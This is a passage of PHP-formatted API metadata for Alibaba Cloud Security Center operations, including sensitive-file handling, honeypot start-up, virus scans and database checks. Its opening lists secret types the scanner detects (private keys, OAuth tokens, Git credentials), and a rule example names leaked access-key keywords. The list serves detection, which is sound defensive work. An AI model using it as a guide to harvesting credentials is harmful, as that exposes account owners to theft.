private key.'."\n" .'* **google_oauth_token**: Google OAuth access token.'."\n" .'* **rubyonrails_cfg**: Ruby On Rails database configuration.'."\n" .'* **lob_api_key**: Lob API key.'."\n" .'* **pkcs_cred**: PKCS#12 certificate.'."\n" .'* **otr_private_key**: Off-the-Record Messaging (OTR) private key.'."\n" .'* **contentful_delivery_token**: Contentful delivery token.'."\n" .'* **digital_ocean_tugboat**: DigitalOcean Tugboat configuration.'."\n" .'* **dsa_private_key**: Digital Signature Algorithm (DSA) private key.'."\n" .'* **rails_app_token**: Rails app token.'."\n" .'* **git_cred**: Git user credential.'."\n" .'* **newrelic_api_key**: User API key for New Relic.'."\n" .'* **github_hub**: hub configuration for storing GitHub tokens.'."\n" .'* **rubygem**: RubyGem token.'."\n", 'type' => 'string', 'required' => false, 'example' => 'pem', 'title' => ''], ], [ 'name' => 'ImageUuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'f382fccd88b94c5c8c864def6815b854,ac32fccd88b94c5c8c864def6815bo9z', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the sensitive file. Valid values:'."\n" ."\n" .'* **0**: The sensitive file is not handled.'."\n" .'* **1**: The sensitive file is added to a whitelist.'."\n" .'* **2**: The sensitive file is reported by mistake.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The types of the assets that are scanned.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the asset that is scanned. Valid values:'."\n" ."\n" .'* **image**.'."\n" .'* **agentless_image**: the image of the host.'."\n" .'* **agentless_snapshot**: the snapshot of the host.'."\n" .'* **ecs_image**.'."\n" .'* **ecs_snapshot**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the sensitive files.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the sensitive file.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The primary key ID of the database.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '18551', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'SetImageSensitiveFileStatus', 'summary' => 'Modifies the status of sensitive files in an image.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetImageSensitiveFileStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:SetImageSensitiveFileStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 18551\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246****\\"\\n}","type":"json"}]', ], 'SetRegistryScanDayNum' => [ 'summary' => 'Specifies a cycle to scan images for image repositories. Unit: days.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'ScanDayNum', 'in' => 'query', 'schema' => ['description' => 'The cycle at which you want to scan your images. Unit: days.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '48483161-F328-5A12-AB78-3EB81F37****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"48483161-F328-5A12-AB78-3EB81F37****\\"\\n}","type":"json"}]', 'title' => 'SetRegistryScanDayNum', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetRegistryScanDayNum'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:SetRegistryScanDayNum', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SetSensitiveDefineRuleConfig' => [ 'summary' => 'Configure the check rules of sensitive files.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '195349', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The configurations of the custom check rule. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **classKey**: the category keyword of the check rule.'."\n" .'* **ruleList**: the keyword of the check rule.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"classKey\\": \\"password\\", \\"ruleList\\": [\\"huaweicloud_ak\\", \\"ak_leak\\"]}]', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the check rules. Valid values:'."\n" ."\n" .'* **image**: image.'."\n" .'* **agentless**: agentless detection.'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'EnableNewRule', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the new ruled for automatic check only on agentless detection. Valid values:'."\n" ."\n" .'* **0**: no.'."\n" .'* **1**: yes.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The custom primary key.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '44616', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'SetSensitiveDefineRuleConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetSensitiveDefineRuleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:SetSensitiveDefineRuleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 44616\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\"\\n}","type":"json"}]', ], 'SetSyncRefreshRegion' => [ 'summary' => 'Sets the region list for asset refresh and synchronization.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '151329', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The cloud asset vendor. Valid values:'."\n" ."\n" .'- **Tencent**: Tencent Cloud.'."\n" .'- **HUAWEICLOUD**: Huawei Cloud.'."\n" .'- **Azure**: Azure.'."\n" .'- **AWS**: AWS.', 'type' => 'string', 'required' => false, 'example' => 'Tencent', 'title' => ''], ], [ 'name' => 'RegionIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of regions to be synchronized for the current site.', 'type' => 'array', 'items' => ['description' => 'The region to be synchronized for the current site.', 'type' => 'string', 'required' => false, 'example' => 'eu-south-1', 'title' => ''], 'required' => false, 'maxItems' => 200, 'title' => '', 'example' => '', ], ], [ 'name' => 'DefaultRegion', 'in' => 'query', 'schema' => ['description' => 'The access type of the multi-cloud site. Valid values:'."\n" .'- **0**: no default site is configured, and you can select regions as needed.'."\n" .'- **1**: the current site is already the default site.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique request ID generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => '9BB78BC9-07B9-578B-B020-C954E6FC****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Set asset refresh and sync region list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetSyncRefreshRegion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:SetSyncRefreshRegion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9BB78BC9-07B9-578B-B020-C954E6FC****\\"\\n}","type":"json"}]', ], 'StartBaselineSecurityCheck' => [ 'summary' => 'Checks cloud service configurations. You can check all items or a specific item and verify whether an item is checked.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92442', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '106.11.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the check task. Valid values:'."\n" ."\n" .'- **check**'."\n" ."\n" .'- **verify**', 'type' => 'string', 'required' => true, 'example' => 'verify', 'title' => ''], ], [ 'name' => 'ItemIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the check items.'."\n" ."\n" .'> To perform a check task on cloud service configurations, you must specify the ID of the check item. You can call the [DescribeRiskItemType](~~DescribeRiskItemType~~) operation to query the IDs of check items.', 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> To perform a check task on cloud service configurations, you must specify the ID of the check item. You can call the [DescribeRiskItemType](~~DescribeRiskItemType~~) operation to query the IDs of check items.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '48D2E9A9-A1B0-4295-B727-0995757C47E9', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RiskItemDisabled', 'errorMessage' => 'Check item not enabled', 'description' => ''], ['errorCode' => 'AllRiskItemTaskNotFinished', 'errorMessage' => 'All inspection items are not finished', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::SubmitCheck'], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"48D2E9A9-A1B0-4295-B727-0995757C47E9\\"\\n}","type":"json"}]', 'title' => 'StartBaselineSecurityCheck', 'description' => 'This API operation is deprecated. Use SubmitCheck instead.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartBaselineSecurityCheck'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:StartBaselineSecurityCheck', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'StartDiscoverDatabaseTask' => [ 'summary' => 'Starts a database scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92443', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'CreateMark' => ['description' => 'The ID of the scan task.'."\n", 'type' => 'string', 'example' => '48bced6d-2aee-4fa2-9aba-b846b77b****', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F46921AF-CC55-5971-92C9-7E09E160****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'TaskIsProcessing', 'errorMessage' => 'Task Is Processing.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CreateMark\\": \\"48bced6d-2aee-4fa2-9aba-b846b77b****\\",\\n \\"RequestId\\": \\"F46921AF-CC55-5971-92C9-7E09E160****\\"\\n}","type":"json"}]', 'title' => 'StartDiscoverDatabaseTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartDiscoverDatabaseTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:StartDiscoverDatabaseTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'StartHoneypot' => [ 'summary' => 'Starts a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n" ."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to query the IDs of honeypots.'."\n", 'type' => 'string', 'required' => true, 'example' => 'dba7d44775be8e0e5888ee3b1a62554a93d2512247cabc38ddeac17a3b3f****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the honeypot.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotId' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n", 'type' => 'string', 'example' => '123'], 'HoneypotName' => ['title' => '', 'description' => 'The custom name of the honeypot.'."\n", 'type' => 'string', 'example' => 'ruoyi'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the management node to which the honeypot belongs.'."\n", 'type' => 'string', 'example' => 'managerNodename'], 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the image that is used for the honeypot.'."\n", 'type' => 'string', 'example' => 'tcp_proxy'], 'PresetId' => ['title' => '', 'description' => 'The ID of the custom configuration for the honeypot.'."\n", 'type' => 'string', 'example' => 'ddh3731641137fe4b72b245346a2721d4b6tdgg3731641137fe4b72b245346a2721***'], 'State' => [ 'title' => '', 'description' => 'The statuses of the honeypots.'."\n", 'type' => 'array', 'items' => ['description' => 'The status of the honeypot. Valid values:'."\n" ."\n" .'* **starting**: enabling'."\n" .'* **running**: normal'."\n" .'* **exited**: disabled'."\n" .'* **upgrade**: updating'."\n" .'* **deleting**: deleting'."\n" .'* **resetting**: resetting'."\n" .'* **created**: created'."\n" .'* **stopping**: stopping'."\n", 'type' => 'string', 'example' => 'running', 'title' => ''], 'example' => '', ], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the image.'."\n", 'type' => 'string', 'example' => 'Webmin'], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"HoneypotId\\": \\"123\\",\\n \\"HoneypotName\\": \\"ruoyi\\",\\n \\"ControlNodeName\\": \\"managerNodename\\",\\n \\"HoneypotImageName\\": \\"tcp_proxy\\",\\n \\"PresetId\\": \\"ddh3731641137fe4b72b245346a2721d4b6tdgg3731641137fe4b72b245346a2721***\\",\\n \\"State\\": [\\n \\"running\\"\\n ],\\n \\"HoneypotImageDisplayName\\": \\"Webmin\\",\\n \\"NodeId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\"\\n },\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\"\\n}","type":"json"}]', 'title' => 'StartHoneypot', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:StartHoneypot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'StartIdcProbeScan' => [ 'summary' => 'Starts an IDC scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92444', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53CXXXX', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53CXXXX\\"\\n}","type":"json"}]', 'title' => 'StartIdcProbeScan', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartIdcProbeScan'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:StartIdcProbeScan', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'StartPreCheckDatabase' => [ 'summary' => 'Starts a database precheck task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92446', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'DatabaseType', 'in' => 'query', 'schema' => ['description' => 'The type of the database. Valid values:'."\n" ."\n" .'* **MYSQL**'."\n" .'* **MSSQL**'."\n" .'* **Oracle**'."\n", 'type' => 'string', 'required' => true, 'example' => 'MYSQL', 'title' => ''], ], [ 'name' => 'UniRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the server that hosts the database.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cn-hongkong', 'title' => ''], ], [ 'name' => 'InstanceUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the agent that is used to back up the data of the database.'."\n" ."\n" .'> You can call the [DescribeUniBackupDatabase](~~DescribeUniBackupDatabase~~) operation to query the UUID.'."\n", 'type' => 'string', 'required' => true, 'example' => 'ec1c0ba21d2911ed800000163e0e****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'CreateMark' => ['description' => 'The ID of the database precheck task.'."\n", 'type' => 'string', 'example' => 't-0006d4pydyir6l1k****', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F6DC2DFF-AB3A-563A-8FC2-3D0D991E****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CreateMark\\": \\"t-0006d4pydyir6l1k****\\",\\n \\"RequestId\\": \\"F6DC2DFF-AB3A-563A-8FC2-3D0D991E****\\"\\n}","type":"json"}]', 'title' => 'StartPreCheckDatabase', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartPreCheckDatabase'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:StartPreCheckDatabase', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'StartVirusScanTask' => [ 'summary' => 'Performs a virus scan task on a server or multiple servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'TargetInfo', 'in' => 'query', 'schema' => ['description' => 'The asset on which you want to perform a virus scan task. You can select servers or server groups to scan for viruses. The value is a string that consists of JSON arrays. Each element in a JSON array is a JSON struct that contains the following fields:'."\n" ."\n" .'* **type**: the type of the asset on which you want to perform a virus scan task. Valid values:'."\n" ."\n" .' * **groupId**: server group.'."\n" .' * **uuid**: server.'."\n" ."\n" .'* **name**: the name of the server or server group.'."\n" ."\n" .'* **target**: the asset on which you want to perform a virus scan task. Valid values:'."\n" ."\n" .' * If you set **type** to **groupId**, you must set this field to the ID of the server group. You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the IDs of server groups.'."\n" .' * If you set **type** to **uuid**, you must set this field to the UUID of the server. You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{"type":"uuid","name":"Host001","target":"503201a7-14c6-4280-801b-1169ed42****"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'ScanTaskId' => ['description' => 'The ID of the virus scan task.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '282832', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'DAE17926-4ABE-4DBD-9600-DDCB9B200F35', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"ScanTaskId\\": 282832,\\n \\"RequestId\\": \\"DAE17926-4ABE-4DBD-9600-DDCB9B200F35\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 282832\\n DAE17926-4ABE-4DBD-9600-DDCB9B200F35\\n","errorExample":""}]', 'title' => 'StartVirusScanTask', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartVirusScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:StartVirusScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 